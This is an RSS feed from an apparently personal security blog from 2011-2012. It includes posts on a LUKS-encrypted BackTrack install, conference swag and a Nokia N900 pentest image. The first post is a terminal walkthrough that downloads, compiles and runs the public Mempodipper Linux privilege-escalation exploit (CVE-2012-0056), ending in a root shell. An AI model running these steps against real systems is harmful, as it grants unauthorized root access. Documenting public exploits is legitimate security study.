<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>netsecuritystuff</title>
	<atom:link href="https://netsecuritystuff.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>https://netsecuritystuff.wordpress.com</link>
	<description>comp stuff, mostly - Charles Watathi</description>
	<lastBuildDate>Fri, 10 Feb 2012 04:38:13 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='netsecuritystuff.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>https://secure.gravatar.com/blavatar/bf7c6d13063a28df7300d41d1edfd8a7?s=96&#038;d=https%3A%2F%2Fs-ssl.wordpress.com%2Fi%2Fbuttonw-com.png</url>
		<title>netsecuritystuff</title>
		<link>https://netsecuritystuff.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="https://netsecuritystuff.wordpress.com/osd.xml" title="netsecuritystuff" />
	<atom:link rel='hub' href='https://netsecuritystuff.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Backtrack 5 kernel whoops !!</title>
		<link>https://netsecuritystuff.wordpress.com/2012/01/24/backtrack-5-kernel-whoops/</link>
		<comments>https://netsecuritystuff.wordpress.com/2012/01/24/backtrack-5-kernel-whoops/#comments</comments>
		<pubDate>Tue, 24 Jan 2012 11:20:30 +0000</pubDate>
		<dc:creator>watathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://netsecuritystuff.wordpress.com/?p=326</guid>
		<description><![CDATA[Backtrack 5, and apparently many other kernels of linux &#62;=2.6.39 can be exploited to get root via a Linux Local Privilege Escalation via SUID /proc/pid/mem Write. Read more from blog http://blog.zx2c4.com Exploit code can be obtained here href=&#8221;http://www.exploit-db.com/exploits/18411/ chalo@bt:~$ uname &#8230; <a href="https://netsecuritystuff.wordpress.com/2012/01/24/backtrack-5-kernel-whoops/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=326&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hackersforcharity.org/johnny/about-johnny/" target="hfc"><br />
<img src="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108&#038;h=300" title="hfc" width="108" height="300" style="border:none;position:fixed;top:0;right:0;z-index:999;" alt="Hackers For Charity" /></a></p>
<p>Backtrack 5, and apparently many other kernels of linux &gt;=2.6.39 can be exploited to get root via a Linux Local Privilege Escalation via SUID /proc/pid/mem Write. Read more from blog <a href="http://blog.zx2c4.com" title="http://blog.zx2c4.com" target="_blank">  http://blog.zx2c4.com</a>  Exploit code can be obtained here<a href="http://www.exploit-db.com/exploits/18411/" title="http://www.exploit-db.com/exploits/18411/" target="_blank">  href=&#8221;http://www.exploit-db.com/exploits/18411/</a></p>
<p>chalo@bt:~$ <font color="red">uname -a</font><br />
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux<br />
chalo@bt:~$ <font color="red">wget -c http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c</font><br />
chalo@bt:~$ <font color="red">gcc -o sploit mempodipper.c</font><br />
chalo@bt:~$ <font color="red">./sploit </font><br />
===============================<br />
=          Mempodipper        =<br />
=           by zx2c4          =<br />
=         Jan 21, 2012        =<br />
===============================</p>
<p>[+] Opening socketpair.<br />
[+] Waiting for transferred fd in parent.<br />
[+] Executing child from child fork.<br />
[+] Opening parent mem /proc/12634/mem in child.<br />
[+] Sending fd 5 to parent.<br />
[+] Received fd at 5.<br />
[+] Assigning fd 5 to stderr.<br />
[+] Ptracing su to find next instruction without reading binary.<br />
[+] Resolved exit@plt to 0x8049a30.<br />
[+] Calculating su padding.<br />
[+] Seeking to offset 0x8049a24.<br />
[+] Executing su with shellcode.<br />
sh-4.1# <font color="red">whoami</font><br />
root</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/netsecuritystuff.wordpress.com/326/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/netsecuritystuff.wordpress.com/326/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/netsecuritystuff.wordpress.com/326/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/netsecuritystuff.wordpress.com/326/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/netsecuritystuff.wordpress.com/326/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/netsecuritystuff.wordpress.com/326/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/netsecuritystuff.wordpress.com/326/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/netsecuritystuff.wordpress.com/326/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/netsecuritystuff.wordpress.com/326/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/netsecuritystuff.wordpress.com/326/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/netsecuritystuff.wordpress.com/326/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/netsecuritystuff.wordpress.com/326/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/netsecuritystuff.wordpress.com/326/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/netsecuritystuff.wordpress.com/326/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=326&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>https://netsecuritystuff.wordpress.com/2012/01/24/backtrack-5-kernel-whoops/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="https://secure.gravatar.com/avatar/c6583c9496cf8354bacbd775fae943b3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">watathi</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108" medium="image">
			<media:title type="html">hfc</media:title>
		</media:content>
	</item>
		<item>
		<title>Installing backtrack on encrypted partition with luks</title>
		<link>https://netsecuritystuff.wordpress.com/2012/01/01/installing-backtrack-on-encrypted-partition-with-luks/</link>
		<comments>https://netsecuritystuff.wordpress.com/2012/01/01/installing-backtrack-on-encrypted-partition-with-luks/#comments</comments>
		<pubDate>Sun, 01 Jan 2012 06:55:06 +0000</pubDate>
		<dc:creator>watathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://netsecuritystuff.wordpress.com/?p=302</guid>
		<description><![CDATA[Before you start please note that this process will format any data you have. Have a full backup of your system before you begin. Be sober while you are doing this please. I have tested the tutorial for backtrack 4 &#8230; <a href="https://netsecuritystuff.wordpress.com/2012/01/01/installing-backtrack-on-encrypted-partition-with-luks/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=302&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hackersforcharity.org/johnny/about-johnny/" target="hfc"><br />
<img src="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108&#038;h=300" title="hfc" width="108" height="300" style="border:none;position:fixed;top:0;right:0;z-index:999;" alt="Hackers For Charity" /></a><br />
Before you start please note that this process will format any data you have. Have a full backup of your system before you begin.  Be sober while you are doing this please. I have tested the tutorial for backtrack 4 pre-final, backtrack 4 final, backtrack 5 and backtrack 5 r1.<br />
Kindly note that my hardisk setup may be different than yours. I want to install backtrack as follows:</p>
<p>/dev/sda1  &#8212;&#8211;     /boot partition<br />
/dev/sda2  &#8212;&#8211;     /root partition</p>
<p><a href="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot1.png"><img src="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot1.png?w=640&#038;h=424" alt="" title="snapshot1" width="640" height="424" class="alignnone size-full wp-image-305" /></a></p>
<p><a href="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot2.png"><img src="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot2.png?w=640&#038;h=260" alt="" title="snapshot2" width="640" height="260" class="alignnone size-full wp-image-306" /></a></p>
<p>My /root partition will be encrypted with luks such that in order for me to boot, i will have to enter a password.Boot with a live cd and proceed as follows<br />
Kindly remember to change your partitions as necessary</p>
<p>Format the /root partition with luks. Enter the password you want to be using at startup.</p>
<p>root@bt:~# <font color="red">cryptsetup luksFormat /dev/sdXX</font></p>
<p>Open the partion for mounting. Enter the password you entered above</p>
<p>root@bt:~# <font color="red">cryptsetup luksOpen /dev/sdXX root</font></p>
<p>Format the container with ext3 filesystem. You can use whichever linux filesystem you are comforable with</p>
<p>root@bt:~#<font color="red"> mkfs.ext3 -j -O extent /dev/mapper/root</font></p>
<p>After this is done, run the backtrack installer(install.sh) on backtrack desktop. Double clicking it should do.<br />
Select your country.<br />
Select the keyboard layout. </p>
<p>Then we now go to partition the disk . Select manual and click next<br />
<a href="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot5.png"><img src="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot5.png?w=640" alt="" title="snapshot5"   class="alignnone size-full wp-image-308" /></a></p>
<p>Select the partition for boot, for me thats /dev/sda1. Click &#8220;edit partition&#8221; and then set the options. In my options, i use ext3 as the file system, i choose to format the partition and the most important bit is that i set the mountpoint as /boot</p>
<p><a href="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot8.png"><img src="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot8.png?w=640" alt="" title="snapshot8"   class="alignnone size-full wp-image-311" /></a></p>
<p>Select the partition for root, for me thats /dev/mapper/root. Click &#8220;edit partition&#8221; and then set the options. In my options, i use ext3 as the file system, i choose to format the partition and the most important bit is that i set the mountpoint as /root</p>
<p><a href="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot7.png"><img src="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot7.png?w=640" alt="" title="snapshot7"   class="alignnone size-full wp-image-310" /></a></p>
<p>My final setup for the install looks as below. I know, my hardisk is rather small <img src='https://s-ssl.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><a href="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot9.png"><img src="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot9.png?w=640" alt="" title="snapshot9"   class="alignnone size-full wp-image-312" /></a></p>
<p>When you click next, you will get a warning about swapspace. I personally opt not to have swapspace. I have enough memory to run backtrack and a few virtual machines. Click &#8220;continue&#8221;</p>
<p>The next bit is important. Click &#8220;Advanced&#8221; .It is the location backtrack will install the bootloader. I usually install the bootloader to hd0 but you can install it to the linux partition. Even if you have windows, you can install the bootloader to hd0, and when it comes time to boot, you will be presented with options as to which os to boot.<br />
<a href="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot11.png"><img src="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot11.png?w=640" alt="" title="snapshot11"   class="alignnone size-full wp-image-313" /></a></p>
<p>You are now set for the install. Click install and wait for the backtrack install to finish. After its done, click the &#8220;continue using the live cd&#8221;<br />
We need to make a few changes before we exit the live cd</p>
<p>root@bt:~#  <font color="red">mkdir /mnt/root</font><br />
root@bt:~#  <font color="red">mount /dev/mapper/root /mnt/root/</font></p>
<p>Mount the /boot partition</p>
<p>root@bt:~#  <font color="red">mount /dev/sdXX /mnt/root/boot</font><br />
root@bt:~#<font color="red"> mount -t proc proc /mnt/root/proc/</font><br />
root@bt:~#<font color="red"> mount -o bind /dev /mnt/root/dev/</font><br />
root@bt:~#<font color="red"> chroot /mnt/root/ /bin/bash</font></p>
<p>Using a text editor like vi or nano, edit the /etc/crypttab and add the /root partition here</p>
<p><font color="red">root     /dev/sdXX     none     luks</font></p>
<p>Using a text editor like vi or nano, edit the /etc/fstab file. Remove any other lines you will find and leave your file in the below order. Replace the XX with your partitions</p>
<p><font color="red">/dev/mapper/root    /               ext3 relatime,errors=remount-ro      0 1<br />
/dev/sdXX        /boot    ext3    defaults    0 0</font></p>
<p>Using a text editor like vi or nano, edit the /etc/initramfs-tools/modules file and add the following modules to the end of the file<br />
<font color="red"><br />
aes-i586<br />
sha256<br />
dm-mod<br />
dm-crypt</font></p>
<p>Create the new initrd image</p>
<p>root@bt:~#<font color="red"> update-initramfs -k all -c</font></p>
<p>Install grub to your harddisk. Use the device name and not a partition e.g /dev/sda</p>
<p>root@bt:~# <font color="red">grub-install /dev/sdX<br />
</font></p>
<p>root@bt:~# <font color="red"> exit<br />
</font><br />
root@bt:~# <font color="red"> reboot<br />
</font></p>
<p>Your /root partition should now be encrypted and you will be asked a password when booting to decrypt it.</p>
<p>Credits to esc201, who wrote a good tutorial on encrypting the disk with bt4-prefinal.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/netsecuritystuff.wordpress.com/302/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/netsecuritystuff.wordpress.com/302/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/netsecuritystuff.wordpress.com/302/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/netsecuritystuff.wordpress.com/302/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/netsecuritystuff.wordpress.com/302/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/netsecuritystuff.wordpress.com/302/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/netsecuritystuff.wordpress.com/302/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/netsecuritystuff.wordpress.com/302/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/netsecuritystuff.wordpress.com/302/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/netsecuritystuff.wordpress.com/302/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/netsecuritystuff.wordpress.com/302/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/netsecuritystuff.wordpress.com/302/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/netsecuritystuff.wordpress.com/302/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/netsecuritystuff.wordpress.com/302/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=302&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>https://netsecuritystuff.wordpress.com/2012/01/01/installing-backtrack-on-encrypted-partition-with-luks/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="https://secure.gravatar.com/avatar/c6583c9496cf8354bacbd775fae943b3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">watathi</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108" medium="image">
			<media:title type="html">hfc</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot1.png" medium="image">
			<media:title type="html">snapshot1</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot2.png" medium="image">
			<media:title type="html">snapshot2</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot5.png" medium="image">
			<media:title type="html">snapshot5</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot8.png" medium="image">
			<media:title type="html">snapshot8</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot7.png" medium="image">
			<media:title type="html">snapshot7</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot9.png" medium="image">
			<media:title type="html">snapshot9</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2012/01/snapshot11.png" medium="image">
			<media:title type="html">snapshot11</media:title>
		</media:content>
	</item>
		<item>
		<title>Swag 2.0 Beta</title>
		<link>https://netsecuritystuff.wordpress.com/2011/08/26/swag-2-0-beta/</link>
		<comments>https://netsecuritystuff.wordpress.com/2011/08/26/swag-2-0-beta/#comments</comments>
		<pubDate>Fri, 26 Aug 2011 19:23:56 +0000</pubDate>
		<dc:creator>watathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://netsecuritystuff.wordpress.com/?p=294</guid>
		<description><![CDATA[Went to Uganda, met Johnny, I let pictures say the rest. But this beats cool at so many levels. thanks for the wonderful time and gifts. He also gave me a coin and the badge for defcon, not included now &#8230; <a href="https://netsecuritystuff.wordpress.com/2011/08/26/swag-2-0-beta/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=294&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hackersforcharity.org/johnny/about-johnny/" target="hfc"><br />
<img src="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108&#038;h=300" title="hfc" width="108" height="300" style="border:none;position:fixed;top:0;right:0;z-index:999;" alt="Hackers For Charity" /></a></p>
<p>Went to Uganda, met Johnny, I let pictures say the rest. But this beats cool at so many levels. thanks for the wonderful time and gifts. He also gave me a coin and the badge for defcon, not included now because they are with a pal. Enjoy the gallery.Its an honor for me</p>
<p>And Johnny is back, what do I mean, he is back to security.Watch this small space. It was a nice cathcup, we spoke of the sweetness of the pwnphone amongst other good things. He is ok, please remember donating to HFC. Ok, enough talk.</p>
<p>Look at this cool dirty security tshirt. Actually I had to put it on on my way back. This just rocks<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/08/20090105_007.jpg"><img src="http://netsecuritystuff.files.wordpress.com/2011/08/20090105_007.jpg?w=640" alt="" title="20090105_007"   class="alignnone size-full wp-image-290" /></a></p>
<p>And a backtrack revolution shirt from the offsec team.  Oh my..<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/08/20090105_005.jpg"><img src="http://netsecuritystuff.files.wordpress.com/2011/08/20090105_005.jpg?w=640" alt="" title="20090105_005"   class="alignnone size-full wp-image-292" /></a></p>
<p>And this hackers for charity defcon shirt to top up the collection. This made heads turn in Nairobi when I put it on.<br />
<a href="http://netsecuritystuff.files.wordpress.com/2011/08/20090105_004.jpg"><img src="http://netsecuritystuff.files.wordpress.com/2011/08/20090105_004.jpg?w=640" alt="" title="20090105_004"   class="alignnone size-full wp-image-293" /></a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/netsecuritystuff.wordpress.com/294/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/netsecuritystuff.wordpress.com/294/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/netsecuritystuff.wordpress.com/294/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/netsecuritystuff.wordpress.com/294/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/netsecuritystuff.wordpress.com/294/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/netsecuritystuff.wordpress.com/294/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/netsecuritystuff.wordpress.com/294/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/netsecuritystuff.wordpress.com/294/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/netsecuritystuff.wordpress.com/294/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/netsecuritystuff.wordpress.com/294/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/netsecuritystuff.wordpress.com/294/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/netsecuritystuff.wordpress.com/294/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/netsecuritystuff.wordpress.com/294/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/netsecuritystuff.wordpress.com/294/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=294&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>https://netsecuritystuff.wordpress.com/2011/08/26/swag-2-0-beta/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="https://secure.gravatar.com/avatar/c6583c9496cf8354bacbd775fae943b3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">watathi</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108" medium="image">
			<media:title type="html">hfc</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/08/20090105_007.jpg" medium="image">
			<media:title type="html">20090105_007</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/08/20090105_005.jpg" medium="image">
			<media:title type="html">20090105_005</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/08/20090105_004.jpg" medium="image">
			<media:title type="html">20090105_004</media:title>
		</media:content>
	</item>
		<item>
		<title>To pwn with pwnimage or not to on the nokia n900</title>
		<link>https://netsecuritystuff.wordpress.com/2011/07/07/to-pwn-or-not-to-pwn/</link>
		<comments>https://netsecuritystuff.wordpress.com/2011/07/07/to-pwn-or-not-to-pwn/#comments</comments>
		<pubDate>Thu, 07 Jul 2011 07:36:33 +0000</pubDate>
		<dc:creator>watathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://netsecuritystuff.wordpress.com/?p=262</guid>
		<description><![CDATA[Pwineexpress has just released the pwnimage for the nokian900 to the community. http://www.pwnieexpress.com/pwn_phone.html The pwnimage is an easy to use customized n900 suited for pentests. It contains some tools you would find in backtrack. I got some time today and &#8230; <a href="https://netsecuritystuff.wordpress.com/2011/07/07/to-pwn-or-not-to-pwn/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=262&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hackersforcharity.org/johnny/about-johnny/" target="hfc"><br />
<img src="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108&#038;h=300" title="hfc" width="108" height="300" style="border:none;position:fixed;top:0;right:0;z-index:999;" alt="Hackers For Charity" /></a></p>
<p>Pwineexpress has just released the pwnimage for the nokian900 to the community. <a href="http://www.pwnieexpress.com/pwn_phone.html">http://www.pwnieexpress.com/pwn_phone.html</a> The pwnimage is an easy to use customized n900 suited for pentests. It contains some tools you would find in backtrack. I got some time today and installed the image to my phone. Below is a screenshot. The question I have is <strong>do I use this pwnimage or do I use my manually</strong> <a href="https://netsecuritystuff.wordpress.com/2011/03/28/nokia-n900/"><strong>customized n900</strong></a></p>
<p><a href="http://netsecuritystuff.files.wordpress.com/2011/07/pwn.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/07/pwn.png?w=640" alt="" title="pwn"   class="alignnone size-full wp-image-264" /></a></p>
<p><a href="http://netsecuritystuff.files.wordpress.com/2011/07/pwn2.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/07/pwn2.png?w=640" alt="" title="pwn2"   class="alignnone size-full wp-image-284" /></a></p>
<p><a href="http://netsecuritystuff.files.wordpress.com/2011/07/pwn3.png"><img src="http://netsecuritystuff.files.wordpress.com/2011/07/pwn3.png?w=640" alt="" title="pwn3"   class="alignnone size-full wp-image-286" /></a></p>
<p>Reasons for the pwnimage<br />
The image comes with presinstalled tools and easy to use shortcuts on the desktop that start applications fast. such as wifizoo,packet injection,sslstrip,metasploit.nmap,fake ap etc. This saves time for any pentester . With just a single click most these tools will run.Its awesome</p>
<p>Reasons against pwnimage<br />
There is a licence agreement that you cannot reverse engineer the software etc which is a little peculiar because most of these software is under gnu or bsd licence.<br />
I try to be paranoid, not running on not so common platforms because of backdoors ,etc</p>
<p>My conclusion:  I will use the pwnimage, first it is a really good idea to have your n900 setup in such an easy mode to pwn for any pentest. I remember when backtrack v1 was released back then, some people argued that you could compile all those packages alone. Right now backtrack is the most widely used pentesting distro. Its not that I cannot run ./configure;make;make install or apt-get install, I love spending some sleepless nights trying to tweak my n900, its just the time saved and bringing all these packages together to work perfectly takes skill and takes time.<br />
Several projects have come up such as Neopwn which was a little hypped up  but we havent seen anything come out of it. I can run backtrack 5 on my n900 but is is a little too slow and the screen calibration on my n900 is really not just working perfectly.<br />
Aside from the fears i know if we the &#8220;community&#8221; can really pick up this pwnimage and improve it m sure there`s better things in the future for the n900. Thanks to pwineexpress for releasing this. I choose to pwn. </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/netsecuritystuff.wordpress.com/262/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/netsecuritystuff.wordpress.com/262/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/netsecuritystuff.wordpress.com/262/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/netsecuritystuff.wordpress.com/262/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/netsecuritystuff.wordpress.com/262/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/netsecuritystuff.wordpress.com/262/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/netsecuritystuff.wordpress.com/262/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/netsecuritystuff.wordpress.com/262/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/netsecuritystuff.wordpress.com/262/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/netsecuritystuff.wordpress.com/262/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/netsecuritystuff.wordpress.com/262/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/netsecuritystuff.wordpress.com/262/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/netsecuritystuff.wordpress.com/262/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/netsecuritystuff.wordpress.com/262/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=262&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>https://netsecuritystuff.wordpress.com/2011/07/07/to-pwn-or-not-to-pwn/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="https://secure.gravatar.com/avatar/c6583c9496cf8354bacbd775fae943b3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">watathi</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/03/hfc1.gif?w=108" medium="image">
			<media:title type="html">hfc</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/07/pwn.png" medium="image">
			<media:title type="html">pwn</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/07/pwn2.png" medium="image">
			<media:title type="html">pwn2</media:title>
		</media:content>

		<media:content url="http://netsecuritystuff.files.wordpress.com/2011/07/pwn3.png" medium="image">
			<media:title type="html">pwn3</media:title>
		</media:content>
	</item>
		<item>
		<title>Pimped by Hackers For Charity</title>
		<link>https://netsecuritystuff.wordpress.com/2011/06/17/i-got-pimped-by-hfc/</link>
		<comments>https://netsecuritystuff.wordpress.com/2011/06/17/i-got-pimped-by-hfc/#comments</comments>
		<pubDate>Fri, 17 Jun 2011 09:18:57 +0000</pubDate>
		<dc:creator>watathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://netsecuritystuff.wordpress.com/?p=237</guid>
		<description><![CDATA[Just back from Uganda where I had gone for some business and also took time to visit Johnny long. He is doing well and his family is ok although he really needs your support. Today is the last day to &#8230; <a href="https://netsecuritystuff.wordpress.com/2011/06/17/i-got-pimped-by-hfc/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=netsecuritystuff.wordpress.com&amp;blog=19477772&amp;post=237&amp;subd=netsecuritystuff&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
